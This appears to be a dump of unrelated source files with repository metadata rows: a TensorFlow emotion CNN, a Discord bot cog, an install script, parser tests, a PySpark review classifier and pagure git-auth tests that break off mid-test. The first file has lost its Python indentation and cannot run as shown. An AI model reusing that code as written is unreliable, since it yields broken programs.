tf.flags.DEFINE_string("mode", "train", "mode: train (Default)/ test")
BATCH_SIZE = 128
LEARNING_RATE = 1e-3
MAX_ITERATIONS = 1000
REGULARIZATION = 1e-3
IMAGE_SIZE = 48
NUM_LABELS = 7
VALIDATION_PERCENT = 0.1
def add_to_regularization_loss(W, b):
tf.add_to_collection("losses", tf.nn.l2_loss(W))
tf.add_to_collection("losses", tf.nn.l2_loss(b))
def weight_variable(shape, stddev=0.02, name=None):
initial = tf.truncated_normal(shape, stddev=stddev)
if name is None:
return tf.Variable(initial)
else:
return tf.get_variable(name, initializer=initial)
def bias_variable(shape, name=None):
initial = tf.constant(0.0, shape=shape)
if name is None:
return tf.Variable(initial)
else:
return tf.get_variable(name, initializer=initial)
def conv2d_basic(x, W, bias):
conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding="SAME")
return tf.nn.bias_add(conv, bias)
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME")
def emotionCNN(dataset):
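    # Two conv -> ReLU -> 2x2 max-pool stages (1->32->64 channels) shrink the
    # 48x48 input to 12x12x64, which is flattened through a 256-unit fully
    # connected layer with dropout and projected onto the 7 emotion logits.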
with tf.name_scope("conv1") as scope:
tf.summary.histogram("W_conv1", weights['wc1'])
tf.summary.histogram("b_conv1", biases['bc1'])
conv_1 = tf.nn.conv2d(dataset, weights['wc1'], strides=[1, 1, 1, 1], padding="SAME")
h_conv1 = tf.nn.bias_add(conv_1, biases['bc1'])
h_1 = tf.nn.relu(h_conv1)
h_pool1 = max_pool_2x2(h_1)
add_to_regularization_loss(weights['wc1'], biases['bc1'])
with tf.name_scope("conv2") as scope:
tf.summary.histogram("W_conv2", weights['wc2'])
tf.summary.histogram("b_conv2", biases['bc2'])
conv_2 = tf.nn.conv2d(h_pool1, weights['wc2'], strides=[1, 1, 1, 1], padding="SAME")
h_conv2 = tf.nn.bias_add(conv_2, biases['bc2'])
h_2 = tf.nn.relu(h_conv2)
h_pool2 = max_pool_2x2(h_2)
add_to_regularization_loss(weights['wc2'], biases['bc2'])
with tf.name_scope("fc_1") as scope:
prob = 0.5
image_size = IMAGE_SIZE // 4
h_flat = tf.reshape(h_pool2, [-1, image_size * image_size * 64])
tf.summary.histogram("W_fc1", weights['wf1'])
tf.summary.histogram("b_fc1", biases['bf1'])
h_fc1 = tf.nn.relu(tf.matmul(h_flat, weights['wf1']) + biases['bf1'])
h_fc1_dropout = tf.nn.dropout(h_fc1, prob)
with tf.name_scope("fc_2") as scope:
tf.summary.histogram("W_fc2", weights['wf2'])
tf.summary.histogram("b_fc2", biases['bf2'])
pred = tf.matmul(h_fc1_dropout, weights['wf2']) + biases['bf2']
return pred
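# Shape trace for the 48x48x1 inputs configured above, following the layer
# definitions in `weights`/`biases`:
#   conv1 5x5/32 + 2x2 max-pool -> 24x24x32
#   conv2 3x3/64 + 2x2 max-pool -> 12x12x64
#   flatten -> 12*12*64 = 9216 -> fc1 (256 units, dropout keep prob 0.5)
#   fc2 -> NUM_LABELS = 7 emotion logits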
weights = {
'wc1': weight_variable([5, 5, 1, 32], name="W_conv1"),
'wc2': weight_variable([3, 3, 32, 64],name="W_conv2"),
'wf1': weight_variable([int((IMAGE_SIZE // 4) * (IMAGE_SIZE // 4)) * 64, 256],name="W_fc1"),
'wf2': weight_variable([256, NUM_LABELS], name="W_fc2")
}
biases = {
'bc1': bias_variable([32], name="b_conv1"),
'bc2': bias_variable([64], name="b_conv2"),
'bf1': bias_variable([256], name="b_fc1"),
'bf2': bias_variable([NUM_LABELS], name="b_fc2")
}
def loss(pred, label):
cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=label))
tf.summary.scalar('Entropy', cross_entropy_loss)
reg_losses = tf.add_n(tf.get_collection("losses"))
tf.summary.scalar('Reg_loss', reg_losses)
return cross_entropy_loss + REGULARIZATION * reg_losses
def train(loss, step):
return tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss, global_step=step)
def get_next_batch(images, labels, step):
offset = (step * BATCH_SIZE) % (images.shape[0] - BATCH_SIZE)
batch_images = images[offset: offset + BATCH_SIZE]
batch_labels = labels[offset:offset + BATCH_SIZE]
return batch_images, batch_labels
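# Example of the wrap-around batching above (illustrative numbers): with 1,000
# training images and BATCH_SIZE = 128, step 0 yields rows 0-127, step 6 yields
# rows 768-895, and step 7 wraps to offset (7*128) % 872 = 24, i.e. rows 24-151.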
# For training
train_error_list = []
train_step_list = []
# For validation
valid_error_list = []
valid_step_list = []
def main(argv=None):
train_images, train_labels, valid_images, valid_labels, test_images = Utility.read_data(FLAGS.data_dir)
print("Training set size: %s" % train_images.shape[0])
print('Validation set size: %s' % valid_images.shape[0])
print("Test set size: %s" % test_images.shape[0])
global_step = tf.Variable(0, trainable=False)
dropout_prob = tf.placeholder(tf.float32)
input_dataset = tf.placeholder(tf.float32, [None, IMAGE_SIZE, IMAGE_SIZE, 1],name="input")
input_labels = tf.placeholder(tf.float32, [None, NUM_LABELS])
pred = emotionCNN(input_dataset)
output_pred = tf.nn.softmax(pred,name="output")
loss_val = loss(pred, input_labels)
train_op = train(loss_val, global_step)
summary_op = tf.summary.merge_all()
init_op = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init_op)
summary_writer = tf.summary.FileWriter(FLAGS.logs_dir, sess.graph)
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print("Model Restored!")
for step in range(MAX_ITERATIONS):
batch_image, batch_label = get_next_batch(train_images, train_labels, step)
feed_dict = {input_dataset: batch_image, input_labels: batch_label}
sess.run(train_op, feed_dict=feed_dict)
if step % 10 == 0:
train_loss, summary_str = sess.run([loss_val, summary_op], feed_dict=feed_dict)
summary_writer.add_summary(summary_str, global_step=step)
train_error_list.append(train_loss)
train_step_list.append(step)
print("Training Loss: %f" % train_loss)
if step % 100 == 0:
valid_loss = sess.run(loss_val, feed_dict={input_dataset: valid_images, input_labels: valid_labels})
valid_error_list.append(valid_loss)
valid_step_list.append(step)
print("%s Validation Loss: %f" % (datetime.now(), valid_loss))
saver.save(sess, FLAGS.logs_dir + 'model.ckpt', global_step=step)
# Plot loss over time
plt.plot(train_step_list, train_error_list, 'r--', label='CNN training loss', linewidth=4)
plt.title('CNN training loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training loss')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(valid_step_list, valid_error_list, 'r--', label='CNN validation loss', linewidth=4)
plt.title('CNN validation loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation loss')
plt.legend(loc='upper right')
plt.show()
print(train_error_list)
print(valid_error_list)
'''
def plotLoss():
# Plot loss over time
plt.plot(train_step_list, train_error_list, 'r--', label='CNN training loss', linewidth=4)
plt.title('CNN training loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training loss')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(valid_step_list, valid_error_list, 'r--', label='CNN validation loss', linewidth=4)
plt.title('CNN validation loss per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation loss')
plt.legend(loc='upper right')
plt.show()
'''
if __name__ == "__main__":
tf.app.run()
| 37.689815 | 116 | 0.666871 |
4a2272dcc0584b4c01ecc64f1c36237865f5d890 | 2,502 | py | Python | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | commands/helpp.py | Waves-rgb/promerator | 2206bec22ace93768eb766999f7542af606ba8c0 | [
"MIT"
] | null | null | null | import discord
import asyncio
import os
import json
import requests
from discord.ext import commands
from discord.ext.commands import has_permissions
import random
from keep_alive import keepAlive
green = discord.Color.green()
class helpp(commands.Cog):
def __init__(self,client):
self.client=client
@commands.command()
async def help(self,ctx):
    embed = discord.Embed(title="Welcome to ZT's Music!", description="Here are the commands to use the bot. Make sure to type ';;' before each command. Example: ;;help", color=green)
    embed.add_field(name="clear", value="Deletes the number of messages you specify (limit is 500). To use this, type: clear 20 (you can replace 20 with any number less than 500). Only works if you have the Manage Messages role.", inline=False)
embed.add_field(name="Source", value="Source code for this bot is shown here." , inline=False)
embed.add_field(name="wiki_summary", value="Shows the first couple sentences of a Wikipedia article about your term, if nothing returns, it is likely that the term was not found as an article and try a similar word such as 'gaming' => 'video game'", inline=True)
embed.add_field(name="help_contact", value="How you can contact me for any support." , inline=True)
embed.add_field(name="search", value="Uses the WolframAplpha API to get the asnwer to your question that coem after. Example: ;;search popualation of Russia, or ;;search 5x+10=30" , inline=True)
embed.add_field(name="ping_check", value="Check latency of the bot" , inline=True)
embed.add_field(name="latency",value=f'{round(self.client.latency * 1000)}ms')
await ctx.send(embed=embed)
@commands.command()
async def ping_check(self,ctx):
embed=discord.Embed(title="My ping is ",description=f'{round(self.client.latency * 1000)}ms',color=green)
await ctx.send(embed=embed)
@commands.command()
async def source(self,ctx):
embed=discord.Embed(title="Source", url="https://github.com/zt07/ZT-s-Music", color=green)
await ctx.send(embed=embed)
  @commands.command(brief="test command", description="test command description")
async def test(self,ctx):
embed= discord.Embed(title=f"Check!", color = green)
await ctx.send(embed=embed)
@commands.command()
async def help_contact(self,ctx):
embed= discord.Embed(title=f"Help Contact:",descritpion="For any help you can dm me at zut0_7 on Instagram, or email me at [email protected]", color = green)
await ctx.send(embed=embed)
def setup(client):
client.add_cog(helpp(client)) | 50.04 | 264 | 0.751399 |
4a2272fe94d63227dfe0635d4dc7bb3b70dd533e | 1,338 | py | Python | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | null | null | null | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | null | null | null | install.py | emekoi/aria | 0c1dea022cf578a2175a2510cf160221b6dd6b0e | [
"MIT"
] | 1 | 2018-10-31T01:47:28.000Z | 2018-10-31T01:47:28.000Z | #!/usr/bin/python2.7
import os, sys, shutil, platform, time
OUTPUT = "bin/aria"
INSTALL = "install"
# EXECUTABLE 755
# REGULAR 644
INSTALLS = [
["bin/aria", 755, "/usr/local/bin"],
["src/aria.h", 644, "/usr/local/include/aria"],
# ["src/util.h", 644, "usr/local/include.aria"],
]
if platform.system() == "Windows":
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
OUTPUT += ".exe"
# INSTALL = "cp"
INSTALLS = [
["bin/aria", 755, "/c/MinGW/bin"],
["src/aria.h", 644, "/c/MinGW/include/aria"],
# ["src/util.h", 644, "/c/MinGW/include/aria"],
]
def fmt(fmt, dic):
for k in dic:
fmt = fmt.replace("{" + k + "}", str(dic[k]))
return fmt
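# Example of the template substitution above (illustrative values):
#   fmt("{install} -m{mode} {file} {dir}",
#       {"install": "install", "mode": 755, "file": "bin/aria", "dir": "/usr/local/bin"})
#   => "install -m755 bin/aria /usr/local/bin"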
def main():
global INSTALL, INSTALLS
print "initing..."
starttime = time.time()
verbose = "verbose" in sys.argv
res = 0
for FILE in INSTALLS:
print "installing " + FILE[0]
cmd = fmt(
"sh -c \"mkdir -p {dir}; {install} -m{mode} {file} {dir}\"",
{
"dir" : FILE[2],
"file" : FILE[0],
"mode" : FILE[1],
"install" : INSTALL,
"output" : OUTPUT,
})
if verbose:
print cmd
res = os.system(cmd)
if res == 0:
print "done (%.2fs)" % (time.time() - starttime)
else:
print "done with errors"
sys.exit(res)
if __name__ == "__main__":
main()
| 19.114286 | 66 | 0.539611 |
4a22734e15ab8143dc7a61c04b39b1dc34d2e5ea | 2,226 | py | Python | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-07-30T14:58:46.000Z | 2021-07-09T15:29:52.000Z | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | test/matchers/test_any_matcher.py | colinta/chomsky | 1c618f02a8e4b573e9c13860181ffeec0f49ccd9 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2017-01-27T13:09:01.000Z | 2017-01-27T13:09:01.000Z | from pytest import raises
from chomsky import *
any_matcher = Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))
autoany_matcher = Literal('Joey') | Literal('Bob') | Literal('Billy')
any_number_matcher = Any(Number | String)
def test_any_repr():
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))"
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=False)) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'))"
assert repr(Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=True)) == "Any(Literal('Joey'), Literal('Bob'), Literal('Billy'), suppress=True)"
def test_autoany_repr():
assert repr(Literal('Joey') | Literal('Bob') | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr('Joey' | Literal('Bob') | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr(Literal('Joey') | Literal('Bob') | 'Billy') == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr(Literal('Joey') | 'Bob' | Literal('Billy')) == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
assert repr('Joey' | Literal('Bob') | 'Billy') == "Any(Literal('Joey') | Literal('Bob') | Literal('Billy'))"
def test_any_lengths():
assert any_matcher.minimum_length() == 3
assert any_matcher.maximum_length() == 5
def test_any():
for name in ['Joey', 'Bob', 'Billy']:
parsed = any_matcher(name)
assert parsed == name
def test_any_number():
assert any_number_matcher('-123') == Number('-123')
def test_any_string():
assert any_number_matcher('"123"') == String('"123"')
def test_any_string_fail():
with raises(ParseException):
any_number_matcher('-"123"')
def test_any_same_char():
for char in ['***', '**', '*']:
parsed = Any(Literal('***'), Literal('**'), Literal('*'))(char)
assert parsed == char
def test_autoany():
for name in ['Joey', 'Bob', 'Billy']:
parsed = autoany_matcher(name)
assert parsed == name
def test_any_fail():
with raises(ParseException):
any_matcher('bahhumbug')
| 35.333333 | 161 | 0.624888 |
4a22741e812c01a3414201d00bc9629668cdcf34 | 5,746 | py | Python | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | case2.py | krishnaiitd/LogisticRegression | bfd5967521baa222aea0df5255354e5248f23b98 | [
"Apache-2.0"
] | null | null | null | #>>>>>> Logistic Regression Classification on AWS reviews datasets, with Cross Validation taking equally from rating datasets, i.e. the dataset is biased towards rating 5 <<<<<
# Import the Basic libraries
import sys
import json
import string
import random
import timeit
# Import the Spark context and config
from pyspark import SparkContext, SparkConf
from pyspark.sql import SQLContext
# Create the SparkContext, sqlContext objects
conf = SparkConf()
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
from pyspark.sql import DataFrame
# Import the ML library need for text hashing
from pyspark.ml.feature import HashingTF
# Import the MLLIB library for classification
from pyspark.mllib.classification import LogisticRegressionWithLBFGS, LogisticRegressionModel, LogisticRegressionWithSGD
from pyspark.mllib.regression import LabeledPoint
# Import the Word tokenize
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
# Initial the English word STOPWORDS and STEMMER
PUNCTUATION = set(string.punctuation)
STOPWORDS = set(stopwords.words('english'))
STEMMER = PorterStemmer()
# Initialze the use variables here
numData = 500
numFeatures = 2000
maximumIteration = 100
regParamValue = 0.01
seedValue = 0
# Result sets which will be stored in a file after all processing completes.
results = [('Name', "Result"), ('File source name', 'LRC_1Gram_Skewness_v8.py'), ('Total number of datasets from each group',numData), ('Total number of datasets from all group', numData*5), ('Total number of Features', numFeatures), ('Classification Parameters:', ''), ('Maximum number of iteration', maximumIteration), ('Reg Param value', regParamValue)]
# Generate unique file name, so that we do not need to change this again and again
uniqueString = '' . join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
FileName = 'LRC_1Gram_numData' + str(numData) + '_numFeatures' + str(numFeatures) + '_r' + uniqueString
# Read the json file and let's watch the first two lines
#reviewsDF = sqlContext.read.json("file:///home/cloudera/SparkML/__data/InLine.json")
#reviewsDF = sqlContext.read.json("gs://sparkrun123/reviews_Apps_for_Android.json.gz")
reviewsDF = sqlContext.read.json("gs://sparkrun123/InLine.json")
print 'Selecting only overall and review Text'
reviewsDF = reviewsDF.select("overall", "reviewText")
# Make the reviews data set persistent RDD
reviewsDF.persist()
print 'Total number of record in review datasets: ' + str(reviewsDF.count())
print 'Number of records by rating:'
print reviewsDF.groupBy('overall').count().orderBy('overall').show()
# Define the Tokenize
def tokenize(text):
tokens = word_tokenize(text)
lowercased = [t.lower() for t in tokens]
no_punctuation = []
for word in lowercased:
punct_removed = ''.join([letter for letter in word if not letter in PUNCTUATION])
no_punctuation.append(punct_removed)
no_stopwords = [w for w in no_punctuation if not w in STOPWORDS]
stemmed = [STEMMER.stem(w) for w in no_stopwords]
return [w for w in stemmed if w]
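# Example of the cleaning pipeline above (illustrative input):
#   tokenize("This is a GREAT app!!") -> ['great', 'app']
# i.e. tokenized, lowercased, punctuation and stopwords removed, Porter-stemmed.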
print 'Clean the review text dataset'
wordsData = reviewsDF.map(lambda (label, text): (label, tokenize(text)))
# Clear reviewsDF from cache/memory
del reviewsDF
wordsData = sqlContext.createDataFrame(wordsData, ['label', 'words'])
hashingTF_1words = HashingTF(inputCol = "words", outputCol="features", numFeatures = numFeatures)
data = hashingTF_1words.transform(wordsData).select("label", "features")
del wordsData
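# HashingTF maps each token list to a sparse term-frequency vector of length
# numFeatures (2000 here) by hashing tokens to indices, so unrelated words can
# collide into the same feature index; a larger numFeatures reduces collisions.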
def TrainLRCModel(trainingData, testData):
    # LogisticRegressionWithLBFGS expects an RDD of LabeledPoint with labels in
    # [0, numClasses), so convert the (label, features) rows and shift the
    # 1-5 star ratings down to 0-4 (keeps the Spark 1.x-style DataFrame.map
    # used elsewhere in this script).
    trainLP = trainingData.map(lambda p: LabeledPoint(p.label - 1, p.features))
    testLP = testData.map(lambda p: LabeledPoint(p.label - 1, p.features))
    model = LogisticRegressionWithLBFGS.train(trainLP, numClasses=5)
    predictions = testLP.map(lambda p: (p.label, model.predict(p.features)))
    correct = predictions.filter(lambda (x, p): x == p)
    ### Calculate the accuracy of the model using custom method
    accuracy = round((correct.count() / float(testLP.count())) * 100, 3)
    # return the final accuracy
    return accuracy
accuracyList = [];
elapsedTimes = [];
for i in range(1,3):
(trainData, testData) = data.randomSplit([.7, .3], seed = seedValue)
start_time = timeit.default_timer()
print 'Model ' + str(i)
print 'Number of dataset in training: ' + str(trainData.count())
print 'Number of dataset in testing: ' + str(testData.count())
# Get the accuracy for model 1
accuracy = TrainLRCModel(trainData, testData)
accuracyList.append(accuracy)
print 'Model ' + str(i) + ' accuracy ' + str(accuracy)
elapsed = timeit.default_timer() - start_time
print "Elapsed time: " + str(round(elapsed / 60, 2)) + ' minutes'
elapsedTimes.append(round(elapsed / 60, 2))
results.append(('Model', i))
results.append(('Number of dataset in training', str(trainData.count())))
results.append(('Number of dataset in testing', testData.count()))
results.append(('Model ' + str(i) + ' accuracy', accuracy))
results.append(("Elapsed time", str(round(elapsed / 60, 2)) + ' minutes'))
print 'All model accuracy list: '
print accuracyList
AverageAccuracy = round(sum(accuracyList) / len(accuracyList), 3)
print 'Average accuracy ' + str(AverageAccuracy) + '%'
results.append(('===Final accuracy=====',''))
results.append(('Average accuracy', str(AverageAccuracy) + '%'))
results.append(('Total time ', str(round(sum(elapsedTimes), 2)) + ' minutes'))
results = sc.parallelize(results)
# Store the actual and predicted classes in a file with name : FileName
def toCSVLine(data):
return ','. join(str(d) for d in data)
lines = results.map(toCSVLine)
lines.saveAsTextFile("gs://spark_123/results/" + FileName)
#lines.saveAsTextFile("file:///home/cloudera/SparkML/__data/" + FileName)
sc.stop()
| 41.042857 | 358 | 0.739297 |
4a22750de6369701cdb7b4806d226f5e36322842 | 210 | py | Python | leetCode/algorithms/easy/keyboard_row.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 25 | 2015-01-21T16:39:18.000Z | 2021-05-24T07:01:24.000Z | leetCode/algorithms/easy/keyboard_row.py | gauravsingh58/algo | 397859a53429e7a585e5f6964ad24146c6261326 | [
"WTFPL"
] | 2 | 2020-09-30T19:39:36.000Z | 2020-10-01T17:15:16.000Z | leetCode/algorithms/easy/keyboard_row.py | ferhatelmas/algo | a7149c7a605708bc01a5cd30bf5455644cefd04d | [
"WTFPL"
] | 15 | 2015-01-21T16:39:27.000Z | 2020-10-01T17:00:22.000Z | class Solution(object):
def findWords(self, words):
rows = [set("qwertyuiop"), set("asdfghjkl"), set("zxcvbnm")]
return [w for w in words if sum(set(w.lower()) <= row for row in rows) == 1]
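# Example (illustrative): Solution().findWords(["Hello", "Alaska", "Dad", "Peace"])
# returns ["Alaska", "Dad"], since only those words use letters from a single row.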
| 42 | 84 | 0.604762 |
4a2275403d1c338668a1327f31ba33f2cce46823 | 23,308 | py | Python | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_lib_git_auth.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
(c) 2015-2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <[email protected]>
Patrick Uiterwijk <[email protected]>
"""
from __future__ import unicode_literals, absolute_import
import datetime
import os
import shutil
import sys
import tempfile
import time
import unittest
import pygit2
import six
from mock import patch, MagicMock
sys.path.insert(
0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
)
import pagure.lib.git
import pagure.lib.query
import tests
from pagure.lib.repo import PagureRepo
class PagureLibGitAuthtests(tests.Modeltests):
""" Tests for pagure.lib.git_auth """
config_values = {"authbackend": "test_auth"}
def setUp(self):
super(PagureLibGitAuthtests, self).setUp()
tests.create_projects(self.session)
tests.create_tokens(self.session)
tests.create_tokens_acl(self.session)
self.create_project_full("hooktest")
def test_edit_with_all_allowed(self):
"""Tests that editing a file is possible if ACLs say allowed."""
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
self.assertIn("test commit", output_text)
# Check file after the commit
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
def test_edit_with_all_denied(self):
"""Tests that editing a file is not possible if ACLs say denied."""
self.set_auth_status(False)
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"Remote hook declined the push: "
"Denied push for ref 'refs/heads/master' for user 'pingou'",
output_text,
)
self.assertIn("All changes have been rejected", output_text)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_pr(self):
"""Tests the ACLs if they only accept PRs."""
self.set_auth_status(
{"refs/heads/master": "pronly", "refs/heads/source": True}
)
user = tests.FakeUser()
user.username = "pingou"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
# Try editing master branch, should fail (only PRs allowed)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"Remote hook declined the push: "
"Denied push for ref 'refs/heads/master' for user 'pingou'",
output_text,
)
self.assertIn("All changes have been rejected", output_text)
# Change something in the "source" branch
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "source",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Commits - hooktest - Pagure</title>", output_text
)
self.assertIn("test commit", output_text)
# Check file after the commit:
output = self.app.get("/hooktest/raw/source/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
# Create the PRs
project = pagure.lib.query.get_authorized_project(
self.session, "hooktest"
)
req = pagure.lib.query.new_pull_request(
session=self.session,
repo_from=project,
branch_from="source",
repo_to=project,
branch_to="master",
title="PR to master",
user="pingou",
)
self.session.add(req)
self.session.commit()
# Check file before the merge
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
# Try to merge (should work)
output = self.app.post(
"/hooktest/pull-request/1/merge",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>PR#1: PR to master - hooktest\n - Pagure</title>",
output_text,
)
# Check file after the merge
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar\n baz")
class PagureLibGitAuthPagureBackendtests(tests.Modeltests):
""" Tests for pagure.lib.git_auth """
config_values = {"authbackend": "pagure"}
def setUp(self):
super(PagureLibGitAuthPagureBackendtests, self).setUp()
tests.create_projects(self.session)
tests.create_tokens(self.session)
tests.create_tokens_acl(self.session)
self.create_project_full("hooktest")
def test_edit_no_commit(self):
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_ticket_rejected(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="ticket",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
"branch": "master",
"csrf_token": self.get_csrf(),
}
output = self.app.post(
"/hooktest/edit/master/f/sources",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 403)
output_text = output.get_data(as_text=True)
self.assertIn(
"You are not allowed to edit files in this project",
output_text,
)
# Check file after the commit:
output = self.app.get("/hooktest/raw/master/f/sources")
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertEqual(output_text, "foo\n bar")
def test_edit_contributor_rejected(self):
project = pagure.lib.query._get_project(self.session, "hooktest")
# Add user foo to project test
msg = pagure.lib.query.add_user_to_project(
self.session,
project=project,
new_user="foo",
user="pingou",
access="collaborator",
branches="epel*",
)
self.session.commit()
user = tests.FakeUser()
user.username = "foo"
with tests.user_set(self.app.application, user):
# Add some content to the git repo
tests.add_content_git_repo(
os.path.join(self.path, "repos", "hooktest.git")
)
data = {
"content": "foo\n bar\n baz",
"commit_title": "test commit",
"commit_message": "Online commits from the gure.lib.get",
"email": "[email protected]",
